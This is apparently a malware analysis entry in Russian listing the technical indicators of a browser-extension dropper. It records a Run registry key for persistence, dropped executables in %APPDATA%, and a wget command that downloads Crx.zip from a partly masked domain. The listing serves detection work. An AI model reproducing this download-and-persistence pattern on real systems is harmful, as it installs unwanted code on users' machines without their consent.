Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'General Browsers' = '<SYSTEM32>;%WINDIR%;<SYSTEM32>\Wbem'
- '%APPDATA%\wget.exe' -O "C:\Twains_64\%USERNAME%\crx.zip" "http://ki###edya.org/Crx.zip"
- '%APPDATA%\install_browser.exe'
- %APPDATA%\unzip.exe
- C:\Twains_64\%USERNAME%\crx.zip
- %APPDATA%\install_browser.exe
- %APPDATA%\wget.exe
- %APPDATA%\unzip.exe
- %APPDATA%\wget.exe
- %APPDATA%\install_browser.exe
- 'ki###edya.org':80
- ki###edya.org/Crx.zip
- DNS ASK ki###edya.org
- ClassName: 'Indicator' WindowName: '(null)'